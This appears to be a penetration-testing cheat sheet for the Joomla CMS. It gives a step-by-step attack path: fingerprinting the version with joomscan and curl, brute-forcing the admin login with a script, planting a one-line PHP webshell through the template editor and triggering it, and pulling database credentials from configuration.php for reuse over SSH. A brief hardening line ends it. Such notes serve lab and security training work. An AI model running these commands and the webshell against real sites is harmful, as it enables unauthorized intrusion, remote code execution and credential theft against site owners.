Joomla
PHP CMS. Fingerprint the version, brute the admin at /administrator, then use the template editor for PHP RCE; configuration.php holds the DB credentials.
Ports
| Port | Proto | Notes |
|---|---|---|
80 | tcp | HTTP |
443 | tcp | HTTPS |
Fingerprint
- /administrator login, README.txt and language XML reveal the version
- droopescan / joomscan identify version and extensions
Key files
| Path | Holds | Sensitive |
|---|---|---|
configuration.php | DB credentials and the secret | sensitive |
administrator/ | admin panel and template editor |
Default / weak creds
admin via brute force / reuse
Known CVEs
| CVE | Impact |
|---|---|
| extension CVEs | most Joomla RCE/SQLi comes from third-party extensions |
Exploitation primitives
- joomscan / droopescan for version and components
- Admin -> Templates -> edit a template PHP file (e.g. error.php) for RCE
- configuration.php DB creds are often reused for SSH/su
Overview
Joomla is a common PHP CMS. The reliable path is weak admin credentials, after which the built-in template editor is a PHP shell.
Enumeration
joomscan --url http://<TARGET>/Version directly:
curl -s http://<TARGET>/administrator/manifests/files/joomla.xml | grep -i versionBrute the admin
Default admin user is often admin; brute /administrator (handles the CSRF token):
python3 joomla-brute.py -u http://<TARGET> -w passwords.txt -usr adminAdmin → RCE
After logging into /administrator: Templates → Templates → (pick one) → edit error.php (or index.php), insert a webshell:
<?php system($_GET['c']); ?>Save, then trigger it:
curl "http://<TARGET>/templates/<template>/error.php?c=id"Loot
curl -s http://<TARGET>/configuration.php # DB creds + secret (via LFI/shell); often reused for SSHHardening
Strong admin creds + 2FA, keep extensions patched, and restrict access to /administrator.